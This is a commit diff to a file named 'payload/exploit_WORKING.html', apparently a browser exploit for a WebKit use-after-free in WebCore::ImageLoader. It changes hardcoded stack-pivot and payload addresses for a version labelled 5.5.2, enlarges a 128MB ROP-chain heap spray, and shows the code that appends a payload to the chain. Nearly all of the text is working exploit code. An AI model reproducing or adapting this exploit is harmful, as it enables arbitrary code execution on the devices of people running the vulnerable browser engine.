128MB Size

2024-11-22 02:09:15 +01:00 · 2018-05-22 16:39:25 +02:00 · 2018-05-22 16:39:25 +02:00 · 5d9ec5c5e9
commit 5d9ec5c5e9
parent 4e60a2f299
1 changed files with 12 additions and 7 deletions
--- a/payload/exploit_WORKING.html
+++ b/payload/exploit_WORKING.html
@ -15,7 +15,11 @@ function UaF(a)
    var ab = new ArrayBuffer(sizeWebCoreImageLoader);
    var dv = new DataView(ab)
    
-    var pivotAdressAdress       = 0x1CEE2000; //r6
+    //5.5.2
+    {
+        var pivotAdressAdress       = 0x1B2E2000; //r6
+        var payloadAdress           = pivotAdressAdress + 1720;
+    }
    /*
    0:000:x86> dt webkit!WebCore::ImageLoader
       +0x000 __VFN_table : Ptr32
@ -39,11 +43,7 @@ function UaF(a)
    
    
    var pivotAdress             = 0x010ADDCC;
-    //5.5.2
-    {
-        var pivotAdressAdress       = 0x1CEE2000; //r6
-        var payloadAdress           = pivotAdressAdress + 1720;
-    }
+
    var codegenAddress          = 0x01800000;
    var sprayCount              = 0x1900;
    var _4K                     = 0x1000;
@ -189,7 +189,7 @@ function UaF(a)

    //Construct the RopChain
    {
-        var RopChainAB = new ArrayBuffer(100*1024*1024);
+        var RopChainAB = new ArrayBuffer(128*1024*1024);
        var RopChain = new DataView(RopChainAB);
        for(var j=0; j<_32K; j+=4){
            RopChain.setUint32(j, 0x10000000+j); //filler
@ -242,8 +242,13 @@ function UaF(a)
        for(var i=0; i<payload.length; i++){
            ropchain_appendu8(payload[i]);
        }
+        
+        
    }

+    //RopChain.setUint32(0x000, 0xDEADCACA);
+    //while(1){}
+    
    //Use the new WebCore::ImageLoader & pivot !
    return 0;
 }